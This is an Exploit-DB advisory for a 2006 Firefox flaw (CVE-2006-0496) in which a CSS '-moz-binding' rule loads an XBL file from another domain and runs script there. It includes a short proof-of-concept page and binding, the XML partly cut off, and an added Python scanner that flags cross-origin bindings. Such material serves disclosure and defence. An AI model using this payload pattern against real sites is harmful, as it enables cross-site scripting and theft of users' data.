Mozilla Firefox 1.0/1.5 XBL - MOZ-BINDING Property Cross-Domain Scripting Vulnerability

ID EDB-ID:27150
Type exploitdb
Reporter Chris Thomas
Modified 2006-01-30T00:00:00


Mozilla Firefox 1.0/1.5 XBL - MOZ-BINDING Property Cross-Domain Scripting Vulnerability. CVE-2006-0496. Remote exploit for Linux platform.


Mozilla Firefox is prone to a security vulnerability that may let a Web page execute malicious script code in the context of an arbitrary domain.

The issue affects the '-moz-binding' property.

This could allow a malicious site to access the properties of a trusted site and facilitate various attacks including disclosure of sensitive information. 

http://domain1/path/to/page.html :

body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }

http://domain2/path/to/xbl.xml :

<?xml version="1.0"?>
<bindings xmlns=""

<binding id="xss">
alert("XBL XSS");
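
For sites that accept or serve third-party CSS, the pattern above can be audited for: the sketch below is an added example, not part of the original advisory, and flags '-moz-binding' declarations whose url() resolves to a different origin than the page. The function names are hypothetical and the matching is regex-based rather than a full CSS parser, so it deliberately errs toward flagging.

```python
import re
from urllib.parse import urljoin, urlsplit

_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# CSS escapes: backslash + 1-6 hex digits (+ one optional whitespace), or backslash + any char
_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?|\\([^\r\n\f])")
_BINDING = re.compile(r"-moz-binding\s*:\s*url\(\s*(['\"]?)(.*?)\1\s*\)", re.I | re.S)
_DEFAULT_PORTS = {"http": 80, "https": 443}

# Constructed sample input, taken from the page/binding pair shown in the advisory.
SAMPLE_PAGE = "http://domain1/path/to/page.html"
SAMPLE_CSS = 'body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }'


def _unescape(css):
    """Decode CSS backslash escapes so '\\2d moz-binding' is seen as '-moz-binding'."""
    def repl(m):
        if m.group(1):
            cp = int(m.group(1), 16)
            return chr(cp) if 0 < cp <= 0x10FFFF else "\ufffd"
        return m.group(2)
    return _ESCAPE.sub(repl, css)


def _origin(url):
    """(scheme, host, port) with default ports filled in, for same-origin comparison."""
    p = urlsplit(url)
    scheme = p.scheme.lower()
    return (scheme, (p.hostname or "").lower(), p.port or _DEFAULT_PORTS.get(scheme))


def cross_origin_bindings(css, page_url):
    """Return absolute URLs of -moz-binding targets whose origin differs from page_url."""
    # Strip comments before decoding escapes, so an escaped "/*" cannot hide a declaration.
    normalized = _unescape(_COMMENT.sub("", css))
    hits = []
    for m in _BINDING.finditer(normalized):
        target = urljoin(page_url, m.group(2).strip())  # resolves relative and //host forms
        if _origin(target) != _origin(page_url):
            hits.append(target)
    return hits


if __name__ == "__main__":
    for url in cross_origin_bindings(SAMPLE_CSS, SAMPLE_PAGE):
        print("cross-origin -moz-binding:", url)
```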